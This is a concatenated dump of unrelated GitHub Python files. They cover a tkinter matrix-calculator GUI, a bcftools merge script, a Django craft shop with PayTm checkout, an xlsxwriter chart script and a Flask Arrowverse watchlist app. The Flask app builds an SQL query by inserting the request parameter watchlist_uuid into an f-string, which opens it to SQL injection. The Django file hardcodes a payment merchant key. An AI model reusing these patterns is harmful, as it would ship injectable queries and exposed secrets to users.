matAddKeyPressed(app, event)\n elif app.screen == 'matMul':\n matMulKeyPressed(app, event)\n elif app.screen == 'matTpose':\n matTposeKeyPressed(app, event)\n elif app.screen == 'GE':\n GEKeyPressed(app, event)\n elif app.screen == 'SOLE':\n SOLEKeyPressed(app, event)\n elif app.screen == 'det':\n detKeyPressed(app, event)\n elif app.screen == 'dirGraph':\n dirGraphKeyPressed(app, event)\n \n # scrolling for screens\n if app.screen == 'matMulSteps' or 'GESteps' or 'SOLESteps' or 'detSteps': # extend to other steps screens\n scrollKeyPressed(app, event)\n\ndef mouseMoved(app, event):\n # For home screen\n if app.screen == 'home':\n for i in range(len(app.buttons[0])):\n app.buttons[0][i].mouseMoved(app, event.x, event.y)\n\n else:\n # back home and back buttons on all other screens\n app.backHomeButton.mouseMoved(app, event.x, event.y)\n app.backButton.mouseMoved(app, event.x, event.y)\n \n if app.screen == 'matCal':\n for i in range(len(app.buttons[1])):\n app.buttons[1][i].mouseMoved(app, event.x, event.y)\n \n elif app.screen == 'matAdd':\n app.solveButton.mouseMoved(app, event.x, event.y)\n app.clearButton.mouseMoved(app, event.x, event.y)\n for i in range(len(app.textBoxes[0][0])):\n app.textBoxes[0][0][i].mouseMoved(app, event.x, event.y)\n app.textBoxes[0][1].mouseMoved(app, event.x, event.y)\n app.textBoxes[0][2].mouseMoved(app, event.x, event.y)\n \n elif app.screen == 'matMul':\n app.solveButton.mouseMoved(app, event.x, event.y)\n app.clearButton.mouseMoved(app, event.x, event.y)\n for i in range(len(app.textBoxes[1][0])):\n app.textBoxes[1][0][i].mouseMoved(app, event.x, event.y)\n for i in range(len(app.textBoxes[1][1])):\n app.textBoxes[1][1][i].mouseMoved(app, event.x, event.y)\n app.textBoxes[1][2].mouseMoved(app, event.x, event.y)\n app.textBoxes[1][3].mouseMoved(app, event.x, event.y)\n \n elif app.screen == 'matMulResult':\n app.stepsButton.mouseMoved(app, event.x, event.y)\n \n elif app.screen == 'matTpose':\n app.solveButton.mouseMoved(app, event.x, event.y)\n app.clearButton.mouseMoved(app, event.x, event.y)\n for i in range(len(app.textBoxes[2][0])):\n app.textBoxes[2][0][i].mouseMoved(app, event.x, event.y)\n app.textBoxes[2][1].mouseMoved(app, event.x, event.y)\n\n elif app.screen == 'GE':\n app.solveButton.mouseMoved(app, event.x, event.y)\n app.clearButton.mouseMoved(app, event.x, event.y)\n for i in range(len(app.textBoxes[3][0])):\n app.textBoxes[3][0][i].mouseMoved(app, event.x, event.y)\n app.textBoxes[3][1].mouseMoved(app, event.x, event.y)\n\n elif app.screen == 'GEResult':\n app.stepsButton.mouseMoved(app, event.x, event.y)\n \n elif app.screen == 'SOLE':\n app.solveButton.mouseMoved(app, event.x, event.y)\n app.clearButton.mouseMoved(app, event.x, event.y)\n for i in range(len(app.textBoxes[4][0])):\n app.textBoxes[4][0][i].mouseMoved(app, event.x, event.y)\n app.textBoxes[4][1].mouseMoved(app, event.x, event.y)\n\n elif app.screen == 'SOLEResult':\n app.stepsButton.mouseMoved(app, event.x, event.y)\n\n elif app.screen == 'det':\n app.solveButton.mouseMoved(app, event.x, event.y)\n app.clearButton.mouseMoved(app, event.x, event.y)\n app.textBoxes[5][0][0].mouseMoved(app, event.x, event.y)\n app.textBoxes[5][1].mouseMoved(app, event.x, event.y)\n\n elif app.screen == 'detResult':\n app.stepsButton.mouseMoved(app, event.x, event.y)\n \n elif app.screen == 'dirGraph':\n app.solveButton.mouseMoved(app, event.x, event.y)\n app.clearButton.mouseMoved(app, event.x, event.y)\n app.textBoxes[6][0][0].mouseMoved(app, event.x, event.y)\n app.textBoxes[6][1].mouseMoved(app, event.x, event.y)\n \n \ndef mousePressed(app, event):\n # For home screen\n if app.screen == 'home':\n for i in range(len(app.buttons[0])):\n if app.buttons[0][i].mousePressed(app, event.x, event.y):\n app.screen = app.screens[i][0]\n else:\n if app.backHomeButton.mousePressed(app, event.x, event.y):\n app.screen = 'home'\n \n if app.screen == 'matCal':\n for i in range(len(app.buttons[1])):\n if app.buttons[1][i].mousePressed(app, event.x, event.y):\n app.screen = app.screens[0][i+1][0]\n \n # For Matrix Addition and its sub-screens\n elif app.screen == 'matAdd':\n matAddMousePressed(app, event)\n elif app.screen == 'matAddResult':\n if app.backButton.mousePressed(app, event.x, event.y):\n app.screen = 'matAdd'\n \n # For Matrix Multiplication and its sub-screens\n elif app.screen == 'matMul':\n matMulMousePressed(app, event)\n elif app.screen == 'matMulResult':\n if app.backButton.mousePressed(app, event.x, event.y):\n app.screen = 'matMul'\n if app.stepsButton.mousePressed(app, event.x, event.y):\n app.scrollY = 0 # resets scroll value\n app.screen = 'matMulSteps'\n elif app.screen == 'matMulSteps':\n if app.backButton.mousePressed(app, event.x, event.y):\n app.screen = 'matMulResult'\n \n # For Tranpose and its sub-screens\n elif app.screen == 'matTpose':\n tposeMousePressed(app, event)\n elif app.screen == 'matTposeResult':\n if app.backButton.mousePressed(app, event.x, event.y):\n app.screen = 'matTpose'\n\n # For GE and its sub-screens\n elif app.screen == 'GE':\n GEMousePressed(app, event)\n elif app.screen == 'GEResult':\n if app.backButton.mousePressed(app, event.x, event.y):\n app.screen = 'GE'\n if app.stepsButton.mousePressed(app, event.x, event.y):\n app.scrollY = 0 # resets scroll value\n app.screen = 'GESteps'\n elif app.screen == 'GESteps':\n if app.backButton.mousePressed(app, event.x, event.y):\n app.screen = 'GEResult'\n\n # For SOLE and its sub-screens\n elif app.screen == 'SOLE':\n SOLEMousePressed(app, event)\n elif app.screen == 'SOLEResult':\n if app.backButton.mousePressed(app, event.x, event.y):\n app.screen = 'SOLE'\n if app.stepsButton.mousePressed(app, event.x, event.y):\n app.scrollY = 0 # resets scroll value\n app.screen = 'SOLESteps'\n elif app.screen == 'SOLESteps':\n if app.backButton.mousePressed(app, event.x, event.y):\n app.screen = 'SOLEResult'\n \n # For det and its sub-screens\n elif app.screen == 'det':\n detMousePressed(app, event)\n elif app.screen == 'detResult':\n if app.backButton.mousePressed(app, event.x, event.y):\n app.screen = 'det'\n if app.stepsButton.mousePressed(app, event.x, event.y):\n app.scrollY = 0 # resets scroll value\n app.screen = 'detSteps'\n elif app.screen == 'detSteps':\n if app.backButton.mousePressed(app, event.x, event.y):\n app.screen = 'detResult'\n \n # For dirGraph and its sub-screens\n elif app.screen == 'dirGraph':\n dirGraphMousePressed(app, event)\n elif app.screen == 'dirGraphResult':\n if app.backButton.mousePressed(app, event.x, event.y):\n app.screen = 'dirGraph'\n elif app.screen == 'detSteps':\n if app.backButton.mousePressed(app, event.x, event.y):\n app.screen = 'dirGraphResult'\n\ndef redrawAll(app, canvas):\n canvas.create_rectangle(0, 0, app.width, app.height, width=0, fill='linen')\n if app.screen == 'home': redrawHomeScreen(app, canvas)\n\n elif app.screen == 'matCal': \n redrawMatCalScreen(app,canvas)\n\n elif app.screen == 'matAdd': \n redrawMatAddScreen(app, canvas)\n elif app.screen == 'matAddResult': \n redrawMatAddResultScreen(app, canvas)\n\n elif app.screen == 'matMul': \n redrawMatMulScreen(app, canvas)\n elif app.screen == 'matMulResult': \n redrawMatMulResultScreen(app, canvas)\n elif app.screen == 'matMulSteps': \n redrawMatMulStepsScreen(app, canvas)\n\n elif app.screen == 'matTpose': \n redrawMatTposeScreen(app, canvas)\n elif app.screen == 'matTposeResult': \n redrawMatTposeResultScreen(app, canvas)\n \n elif app.screen == 'GE': \n redrawGEScreen(app, canvas)\n elif app.screen == 'GEResult': \n redrawGEResultScreen(app, canvas)\n elif app.screen == 'GESteps': \n redrawGEStepsScreen(app, canvas)\n\n elif app.screen == 'SOLE': \n redrawSOLEScreen(app, canvas)\n elif app.screen == 'SOLEResult': \n redrawSOLEResultScreen(app, canvas)\n elif app.screen == 'SOLESteps': \n redrawSOLEStepsScreen(app, canvas)\n\n elif app.screen == 'det': \n redrawDetScreen(app, canvas)\n elif app.screen == 'detResult':\n redrawDetResultScreen(app, canvas)\n elif app.screen == 'detSteps':\n redrawDetStepsScreen(app, canvas)\n\n elif app.screen == 'dirGraph':\n redrawDirGraphScreen(app, canvas)\n elif app.screen == 'dirGraphResult':\n redrawDirGraphResultScreen(app, canvas)\n\ndef run241ForOne():\n runApp(title=\"241-for-One\")\n\nrun241ForOne()","repo_name":"J4yDubs/241-for-One","sub_path":"TP code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35365649268","text":"from __future__ import absolute_import\nfrom .shears import clip, \\\n remove_dominant_colors, \\\n filter_img, \\\n im_to_color_diffs, \\\n crop_with_color_diffs, \\\n get_longest_match, \\\n load_image, \\\n save_image, \\\n scale_1d_array, \\\n plot_image, \\\n show_image, \\\n plot_1d\n\n__version__ = '0.0.1'","repo_name":"YaleDHLab/shears","sub_path":"shears/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"71935050405","text":"#!/usr/bin/env python\n\nimport glob\nimport os\nimport subprocess\nimport argparse\n\nparser = argparse.ArgumentParser(description=\"Combine GVCFs from multiple intervals with bcftools\")\n\nparser.add_argument('--indir', required=True, help='path to input directory containing vcfs', action='store')\nparser.add_argument('--output', required=True, help='path to output vcf file', action='store')\n\nargs=parser.parse_args()\n\nindir = args.indir\noutput = args.output\n\nvcfs = glob.glob(indir + \"*.g.vcf.gz\")\n\ninputs = \" \".join((f) for f in vcfs)\nprint(inputs)\n\ntemp_dir = indir + '/temp'\n#print(vcfs)\n\n#with open(indir + \"vcflist.list\", \"w\") as filehandle:\n# for listitem in vcfs:\n# filehandle.write('%s\\n' % listitem)\n\nsubprocess.run(args=['bcftools', 'concat', '--threads', '10', inputs])\n#subprocess.run(args=['bcftools', 'sort', '-m', '15G', '-T', temp_dir, '-Oz', '-o', output, 'elata.temp.g.vcf.gz'])\n\n\n\n\n#inputs = \"\\n\".join(\"I={}\".format(f) for f in vcfs)\n#inputs = \"\\n\".join(format(f) for f in vcfs)\n\n#print(inputs)\n\n#f = open(indir + \"vcflist.list\", \"w\")\n#f.write(inputs + \"\\n\")\n#f.close\n\n#outvcf = 'O=' + output\n\n#command = 'picard MergeVcfs ' + inputs + outvcf\n#print(command)\n#invcfs = 'I=' + indir + 'vcflist.list'\n\n\n#print(invcfs)\n#print(dictionary)\n#print(outvcf)\n\n#subprocess.run(args=['picard', 'MergeVcfs', invcfs, outvcf])\n","repo_name":"davidecarlson/snakemake-GATK","sub_path":"scripts/merge_vcfs.py","file_name":"merge_vcfs.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40666275343","text":"#given an array find min amp you can get after changing up to 3 elem.\n\nstrarr = input().split(' ')\narr = []\nfor elem in strarr:\n arr.append(int(elem))\n\narr.sort()\nlasti = len(arr)-1\n\noption1 = arr[lasti-3]-arr[0] # 3 from back\noption2 = arr[lasti-2]-arr[1] # 2 front 1 back\noption3 = arr[lasti-1]-arr[2] # 1 front 2 back\noption4 = arr[lasti]-arr[3] # 3 front\n\nprint(min(option1,option2,option3,option4))","repo_name":"sreyaaluri/funsies","sub_path":"google_assessment/minamp.py","file_name":"minamp.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5986494154","text":"from math import ceil\nfrom django.shortcuts import get_object_or_404, render,HttpResponse,redirect\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate,login,logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.template import loader\nfrom datetime import datetime\nfrom django.contrib import messages\nfrom .models import Product,Orders\nfrom PayTm import Checksum\nfrom django.views.decorators.csrf import csrf_exempt\nMERCHANT_KEY = 'kbzk1DSbJiV_03p5'\n\n# Create your views here.\n\ndef index(request):\n \n return render(request,'index.html')\n\ndef register(request):\n if request.method==\"POST\":\n first_name=request.POST.get('first_name')\n last_name=request.POST.get('last_name')\n username=request.POST.get('username')\n password=request.POST.get('password')\n \n user=User.objects.filter(username=username)#ye apan ne isiliye likha jisse agar manlo apan ne register ke time pe same username dalke submit kara to unique constraint ka error na ye\n if user.exists():\n messages.info(request,\"Username already taken\")\n return redirect('register')\n \n \n user=User.objects.create(\n first_name=first_name,\n last_name=last_name,\n username=username\n )\n \n \n user.set_password(password)#this is done so that password is encrypted\n user.save()\n \n messages.info(request,'Account created succesfully')\n \n return redirect('register')\n \n return render(request,'register.html')\n \n \n\ndef loginuser(request):\n if request.method==\"POST\":\n \n username=request.POST.get('username')\n password=request.POST.get('password')\n \n if not User.objects.filter(username=username).exists():#ye check karne ke liye ki iss username se user exists karta h ya nhi\n messages.info(request,\"Invalid Username \")\n return redirect('loginuser')\n \n user=authenticate(username=username,password=password)#agar username ya password galat hua to ye None return karega\n \n if user is None:\n messages.info(request,\"Invalid Password\")\n return redirect('loginuser')\n \n else:\n login(request,user)\n return redirect('mainpage')\n \n \n \n return render(request,'index.html')\n\ndef logoutuser(request):\n logout(request)\n return redirect('loginuser')\n\n \n \n@login_required(login_url=\"loginuser\")\ndef mainpage(request):\n return render(request,'mainpage.html')\n\n@login_required(login_url=\"loginuser\")\ndef dreamcatchers(request):\n products=Product.objects.all()\n \n allProds=[]\n catprods=Product.objects.values('category','id')\n #print(catprods)\n cats={item['category'] for item in catprods}\n #print(\"categories are \",cats)\n for cat in cats:\n prod=Product.objects.filter(category=cat)\n print(prod)\n n=len(prod)\n nslides=n//4 + ceil((n/4)-(n//4))\n allProds.append([prod,range(1,nslides),nslides])\n #print(allProds) \n params={'allProds':allProds}\n return render(request,'dreamcatchers.html',params)\n\n# @login_required(login_url=\"loginuser\")\n# def resinproducts(request):\n# products=Product.objects.all()\n# print(products)\n# return render(request,'resinproducts.html',context={'products':products})\n\n\n \n\ndef checkout(request):\n thank=False\n if request.method==\"POST\":\n items_json = request.POST.get('itemsJson', '')\n name = request.POST.get('name', '')\n amount = request.POST.get('amount', '')\n email = request.POST.get('email', '')\n address = request.POST.get('address1', '') + \" \" + request.POST.get('address2', '')\n city = request.POST.get('city', '')\n state = request.POST.get('state', '')\n zip_code = request.POST.get('zip_code', '')\n phone = request.POST.get('phone', '')\n order = Orders(items_json=items_json, name=name, email=email, address=address, city=city,\n state=state, zip_code=zip_code, phone=phone,amount=amount)\n order.save()\n \n thank = True\n id = order.order_id\n param_dict = {\n\n 'MID': 'muFqPO48357187186180',\n 'ORDER_ID': str(order.order_id),\n 'TXN_AMOUNT': str(amount),\n 'CUST_ID': email,\n 'INDUSTRY_TYPE_ID': 'Retail',\n 'WEBSITE': 'WEBSTAGING',\n 'CHANNEL_ID': 'WEB',\n 'CALLBACK_URL':'http://127.0.0.1:8000/handlerequest',\n\n }\n \n #return render(request, 'checkout.html', {'thank':thank, 'id': id})\n param_dict['CHECKSUMHASH'] = Checksum.generate_checksum(param_dict, MERCHANT_KEY)\n return render(request, 'paytm.html', {'param_dict': param_dict})\n return render(request, 'checkout.html')\n\n\n@csrf_exempt\ndef handlerequest(request):\n # paytm will send you post request here\n form = request.POST\n response_dict = {}\n for i in form.keys():\n response_dict[i] = form[i]\n if i == 'CHECKSUMHASH':\n checksum = form[i]\n\n verify = Checksum.verify_checksum(response_dict, MERCHANT_KEY, checksum)\n if verify:\n if response_dict['RESPCODE'] == '01':\n print('order successful')\n else:\n print('order was not successful because' + response_dict['RESPMSG'])\n return render(request, 'paymentstatus.html', {'response': response_dict})\n\n\n \n@login_required(login_url=\"loginuser\")\ndef gallery(request):\n \n \n return render(request,'gallery.html')","repo_name":"PULAK-0308/cc","sub_path":"crafts website/ecommerce/craft/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15110126630","text":"#coding: utf8\nimport xlsxwriter\n\n# 创建一个excel文件\nworkbook = xlsxwriter.Workbook('PieChart.xls')\n# 创建一个工作表对象,sheet栏\nworksheet = workbook.add_worksheet('game') #u'数据报表'\n# 创建一个图表对象 type:colum(柱状图)\nchart = workbook.add_chart({'type':'pie'})\n# 定义数据表头列表\ntitle = [u'游戏名称',u'星期一',u'星期二',u'星期三',u'星期四',u'星期五',u'星期六',u'星期日',u'总时长']\n# 定义业务名称列表\nbuname = [u'英雄联盟',u'王者荣耀',u'洛奇英雄转',u'剑灵',u'龙之谷']\n# 定义数据\ndata = [\n [150,152,158,149,155,145,148],\n [89,88,95,93,98,100,99],\n [201,200,198,175,170,198,195],\n [75,77,78,78,74,70,79],\n [88,85,87,90,93,88,84]\n]\n\n# 定义format格式对象\nformat = workbook.add_format()\n# 定义format对象单元格边框加粗(1像素)的格式\nformat.set_border(1)\n\n# 定义format_title格式对象\nformat_title = workbook.add_format()\nformat_title.set_border(1)\n# 定义format_title对象单元格背景颜色\nformat_title.set_bg_color('#cccccc')\n\n# 定义format_ave单元格式\nformat_ave = workbook.add_format()\nformat_ave.set_border(1)\n# 定义format_ave对象单元格数字显示格式(小数点后2位)\nformat_ave.set_num_format('0.00')\n\n# 将数据,信息写入xls文件\n#以行的方式写\nworksheet.write_row('A1',title,format_title)\nworksheet.write_column('A2',buname,format)\nworksheet.write_row('B2',data[0],format)\nworksheet.write_row('B3',data[1],format)\nworksheet.write_row('B4',data[2],format)\nworksheet.write_row('B5',data[3],format)\nworksheet.write_row('B6',data[4],format)\n\n# 定义图表数据系列函数\ndef chart_series(cur_row):\n '''\n 绘制柱状图\n :param cur_row:行号String类型\n :return:\n '''\n # 计算(AVERAGE函数)频道周平均流量\n worksheet.write_formula('I'+cur_row,'=SUM(B'+cur_row+':H'+cur_row+')',format_ave)\n\n\n# 数据以2-6行进行图表数据系列函数\nfor row in range(2,7):\n chart_series(str(row))\n\nchart.add_series({\n 'name': u'游戏时长周报图表',\n 'categories': '=game!$A$2:$A$6',\n 'values': '=game!$I$2:$I$6',\n 'points':[\n {'fill':{'color':'#00CD00'}},\n {'fill':{'color':'red'}},\n {'fill':{'color':'yellow'}},\n {'fill':{'color':'gray'}},\n ],\n })\nchart.set_style(2)\n# 设置标题\nchart.set_title({'name':u'游戏时长周报图表'})\n# 设置y轴(左侧)小标题\nchart.set_y_axis({'name': u'h(小时)'})\n# chart.set_y_2axis()\n\n#将图表插入在A8单元格\nworksheet.insert_chart('A8', chart, {'x_offset': 25, 'y_offset': 10})\n\n# 关闭xls\nworkbook.close()","repo_name":"1182640071/writeXls","sub_path":"writePie.py","file_name":"writePie.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"14765306292","text":"\"\"\"\nThe flask application.\n\"\"\"\n\n# standard library full imports\nimport sqlite3\n\n# standard library partial imports\nfrom dataclasses import dataclass\nfrom typing import Any, Union\n\n# third party library partial imports\nfrom flask import Flask, redirect, render_template, request, url_for\n\n@dataclass\nclass ArrowverseShow():\n \"\"\"\n The ArrowverseShow class represents a show in the Arrowverse.\n \"\"\"\n showname: str\n show_image: str\n background_color: str = \"#000000\"\n foreground_color: str = \"#ffffff\"\n\n@dataclass\nclass ArrowverseShowEpisode:\n \"\"\"\n The ArrowverseShowEpisode class represents an episode in the Arrowverse.\n \"\"\"\n showname: str\n episode_id: int\n season: int\n episode: int\n name: str\n airdate: str\n image: str\n background_color: str = \"#000000\"\n foreground_color: str = \"#ffffff\"\n watched: int = 0\n\n@dataclass\nclass EpisodeWatchState:\n \"\"\"\n The EpisodeWatchState class represents the watched status of an episode.\n \"\"\"\n episode_id: int\n watched: int = 0\n\napp = Flask(__name__)\n\ndef get_shows() -> list[ArrowverseShow]:\n \"\"\"\n Create a list of ArrowverseShow objects from the database.\n\n Parameters:\n None\n Returns:\n list[ArrowverseShow]: A list of ArrowverseShow objects\n \"\"\"\n\n # Create a connection to the database\n with sqlite3.connect('arrowverse.db') as conn:\n\n # Create a cursor\n c: sqlite3.Cursor = conn.cursor()\n\n # Create a list of ArrowverseShow objects\n arrowverse_shows: list[ArrowverseShow] = []\n\n # Get all the episodes from the database\n c.execute(\n \"\"\"\n SELECT\n Shows.Name,\n Shows.Image,\n Shows.BackgroundColor,\n Shows.ForegroundColor\n From\n Shows\n \"\"\"\n )\n\n # Loop through the results\n for row in c.fetchall():\n\n # Create an ArrowverseShow object\n arrowverse_show: ArrowverseShow = ArrowverseShow(\n showname=row[0],\n show_image=row[1],\n background_color=row[2],\n foreground_color=row[3]\n )\n\n # Add the ArrowverseShow object to the list\n arrowverse_shows.append(arrowverse_show)\n\n # Return the list of ArrowverseShow objects\n return arrowverse_shows\n\ndef get_list_of_episodes(watchlist_uuid: Union[str, None] = None) -> list[ArrowverseShowEpisode]:\n \"\"\"\n Create a list of ArrowverseShowEpisode objects from the database.\n\n Parameters:\n watchlist_uuid (Union[str, None], optional): The watchlist uuid. Defaults to None.\n Returns:\n list[ArrowverseShowEpisode]: A list of ArrowverseShowEpisode objects\n \"\"\"\n\n arrowverse_shows: list[ArrowverseShowEpisode] = []\n\n # Create a connection to the database\n with sqlite3.connect('arrowverse.db') as conn:\n\n # Create a cursor\n c: sqlite3.Cursor = conn.cursor()\n\n # Create a list of ArrowverseShow objects\n\n query: str = \"\"\"\n SELECT\n Episodes.EpisodeId,\n Shows.Name,\n Seasons.SeasonNumber,\n Episodes.EpisodeNumber,\n Episodes.Name,\n Episodes.AirDate,\n Episodes.Image,\n Shows.BackgroundColor,\n Shows.ForegroundColor\n FROM Shows\n JOIN Seasons\n ON Shows.ShowId = Seasons.ShowId\n JOIN Episodes\n ON Seasons.SeasonId = Episodes.SeasonId\n ORDER BY Episodes.AirDate ASC\n \"\"\"\n\n if type(watchlist_uuid) == str:\n # get the episode details like normal, but also get the watched status from the watchlist if it exists\n query = f\"\"\"\n SELECT \n Episodes.EpisodeId,\n Shows.Name AS ShowName,\n Seasons.SeasonNumber,\n Episodes.EpisodeNumber,\n Episodes.Name AS EpisodeName,\n Episodes.AirDate,\n Episodes.Image,\n Shows.BackgroundColor,\n Shows.ForegroundColor,\n CASE\n WHEN WatchlistItems.Watched IS NOT NULL \n THEN WatchlistItems.Watched \n ELSE 0 \n END \n AS Watched\n FROM Episodes\n JOIN Seasons\n ON Episodes.SeasonId = Seasons.SeasonId\n JOIN Shows\n ON Seasons.ShowId = Shows.ShowId\n LEFT JOIN\n (\n SELECT DISTINCT EpisodeId, Watched\n FROM WatchlistItems\n JOIN Watchlists\n ON WatchlistItems.WatchlistId = Watchlists.WatchlistId\n WHERE Watchlists.WatchlistUUID = '{watchlist_uuid}'\n ) AS WatchlistItems\n ON Episodes.EpisodeId = WatchlistItems.EpisodeId\n ORDER BY Episodes.AirDate ASC;\n \"\"\"\n\n # Get all the episodes from the database\n c.execute(query)\n\n # Loop through the results\n for row in c.fetchall():\n\n # Create an ArrowverseShow object\n if len(row) == 9: # if the watchlist_uuid is not provided, then the row will only have 9 columns\n row = list(row)\n row.append(0) # add the watched status to the end of the row\n row = tuple(row)\n\n arrowverse_show: ArrowverseShowEpisode = ArrowverseShowEpisode(\n episode_id=row[0],\n showname=row[1],\n season=row[2],\n episode=row[3],\n name=row[4],\n airdate=row[5],\n image=row[6],\n background_color=row[7],\n foreground_color=row[8],\n watched=row[9]\n )\n\n # Add the ArrowverseShow object to the list\n arrowverse_shows.append(arrowverse_show)\n\n # Return the list of ArrowverseShow objects\n return arrowverse_shows\n\ndef get_watchlist_display_name(uuid: Union[str, None]) -> Union[str, None]:\n \"\"\"\n Get the display name of a watchlist from the database.\n\n Parameters:\n uuid (Union[str, None]): The uuid of the watchlist.\n Returns:\n Union[str, None]: The display name of the watchlist or None if the watchlist does not exist.\n \"\"\"\n\n if type(uuid) != str:\n return None\n\n # Create a connection to the database\n with sqlite3.connect('arrowverse.db') as conn:\n\n # Create a cursor\n c: sqlite3.Cursor = conn.cursor()\n\n c.execute(\"\"\"\n SELECT\n DisplayName\n FROM\n Watchlists\n Where\n WatchlistUUID = ?\n \"\"\", (uuid,))\n result: Any = c.fetchone()\n\n # check if the watchlist exists\n if result is None:\n return None\n\n # get the display name\n display_name: str = result[0]\n\n return display_name\n\ndef ensure_watchlist_exists(watchlist_uuid: str, watchlist_display_name: str) -> None:\n \"\"\"\n Ensure that a watchlist exists in the database. If it does not exist, create it.\n\n Parameters:\n watchlist_uuid (str): The uuid of the watchlist.\n watchlist_display_name (str): The display name of the watchlist.\n Returns:\n None\n \"\"\"\n\n with sqlite3.connect('arrowverse.db') as conn:\n\n # Create a cursor\n c: sqlite3.Cursor = conn.cursor()\n\n c.execute(\"\"\"\n SELECT\n WatchlistId\n FROM\n Watchlists\n WHERE\n WatchlistUUID = ?\n \"\"\", (watchlist_uuid, ))\n\n result: Any = c.fetchone()\n\n if result:\n return\n\n c.execute(\"\"\"\n INSERT\n INTO Watchlists (\n WatchlistUUID,\n DisplayName\n )\n VALUES (\n ?,\n ?\n ) \n \"\"\", (\n watchlist_uuid,\n watchlist_display_name\n ))\n\n conn.commit()\n return\n\ndef get_watchlist_id(watchlist_uuid: str) -> int:\n \"\"\"\n Get the id of a watchlist from the database.\n\n Parameters:\n watchlist_uuid (str): The uuid of the watchlist.\n Returns:\n int: The id of the watchlist or -1 if the watchlist does not exist.\n \"\"\"\n\n with sqlite3.connect('arrowverse.db') as conn:\n\n # Create a cursor\n c: sqlite3.Cursor = conn.cursor()\n\n c.execute(\"\"\"\n SELECT\n WatchlistId\n FROM\n Watchlists\n WHERE\n WatchlistUUID = ?\n \"\"\", (watchlist_uuid, ))\n\n result: Any = c.fetchone()\n\n # check if the watchlist exists\n if result is None:\n return -1\n\n watchlist_id: int = result[0]\n\n return watchlist_id\n\ndef add_episodes(watchlist_uuid: str, watchlist_display_name: str, episode_watch_states: list[EpisodeWatchState]) -> None:\n \"\"\"\n Add episodes to a watchlist.\n\n Parameters:\n watchlist_uuid (str): The uuid of the watchlist.\n watchlist_display_name (str): The display name of the watchlist.\n episode_watch_states (list[EpisodeWatchState]): A list of EpisodeWatchState objects.\n Returns:\n None\n \"\"\"\n # check if the watchlist exists\n ensure_watchlist_exists(watchlist_uuid, watchlist_display_name)\n\n # get the watchlist id\n watchlist_id: int = get_watchlist_id(watchlist_uuid)\n\n if watchlist_id == -1:\n return\n\n with sqlite3.connect('arrowverse.db') as conn:\n\n # Create a cursor\n c: sqlite3.Cursor = conn.cursor()\n\n for episode_watch_state in episode_watch_states:\n episode_id: int = episode_watch_state.episode_id\n watched: int = episode_watch_state.watched\n\n c.execute(\"\"\"\n SELECT\n WatchlistItemId\n FROM\n WatchlistItems\n WHERE\n WatchlistId = ?\n AND EpisodeId = ?\n \"\"\", (watchlist_id, episode_id))\n\n result: Any = c.fetchall()\n\n query: str = \"\"\"\n INSERT\n INTO WatchlistItems (\n WatchlistId,\n EpisodeId,\n Watched\n )\n VALUES (\n :watchlist_id,\n :episode_id,\n :watched\n )\n \"\"\"\n\n if len(result) != 0:\n query = \"\"\"\n UPDATE\n WatchlistItems\n SET\n Watched = :watched\n WHERE\n WatchlistId = :watchlist_id\n AND EpisodeId = :episode_id\n \"\"\"\n\n c.execute(query, {\n \"watchlist_id\": watchlist_id,\n \"episode_id\": episode_id,\n \"watched\": watched\n })\n\n conn.commit()\n\ndef filter_arrowverse_items(\n shows: list[Any],\n allowed_shows: str\n) -> list[Any]:\n\n showname_map: dict[str, str] = {\n 'dclot': 'DC Legends of Tomorrow',\n 'tf': 'The Flash',\n 'a': 'Arrow',\n 'sg': 'Supergirl',\n 'bw': 'Batwoman',\n 'bl': 'Black Lightning',\n }\n\n shownames_list: list[str] = allowed_shows.split(',')\n\n shownames_list = [showname_map.get(showname, \"N/a\")\n for showname in shownames_list]\n \n shownames_list = [showname for showname in shownames_list if showname != \"N/a\"]\n\n if len(shownames_list) == 0:\n return shows\n\n return [\n item\n for item in shows\n if item.showname in shownames_list\n ]\n\n@app.route('/')\ndef index():\n \"\"\"\n The index route.\n\n Parameters:\n None\n Returns:\n str: The rendered template\n \"\"\"\n\n # Get the query parameters\n shownames: Union[str, None] = request.args.get('shownames')\n watchlist_uuid: Union[str, None] = request.args.get('watchlist')\n watchlist_display_name: Union[str, None] = get_watchlist_display_name(\n watchlist_uuid)\n\n # Create a list of ArrowverseShow objects\n arrowverse_shows: list[ArrowverseShow] = get_shows()\n\n # Create a list of ArrowverseShowEpisode objects\n arrowverse_episodes: list[ArrowverseShowEpisode] = get_list_of_episodes(\n watchlist_uuid=watchlist_uuid)\n\n if type(shownames) == str:\n\n temp: list[Any] = filter_arrowverse_items(arrowverse_shows, shownames)\n\n if not all(isinstance(item, ArrowverseShow) for item in temp):\n raise TypeError(\"Not all elements are ArrowverseShow\")\n\n arrowverse_shows = temp\n\n temp = filter_arrowverse_items(arrowverse_episodes, shownames)\n\n if not all(isinstance(item, ArrowverseShowEpisode) for item in temp):\n raise TypeError(\"Not all elements are ArrowverseShowEpisode\")\n\n arrowverse_episodes = temp\n\n # Render the template\n return render_template(\n 'index.html',\n watchlist_uuid=watchlist_uuid,\n watchlist_display_name=watchlist_display_name,\n shows=arrowverse_shows,\n episodes=arrowverse_episodes\n )\n\n@app.route('/save_watchlist', methods=['POST'])\ndef save_watchlist():\n \"\"\"\n POST endpoint to save a watchlist.\n\n Parameters:\n None\n Returns:\n str: A redirect to the index route.\n \"\"\"\n\n json_data: Any = request.get_json()\n\n if json_data is None:\n return redirect(url_for('index'))\n\n # if the watchlist_uuid is not in the JSON payload\n if 'watchlist_uuid' not in json_data:\n return redirect(url_for('index'))\n\n # if the watchlist_uuid is not a string\n if 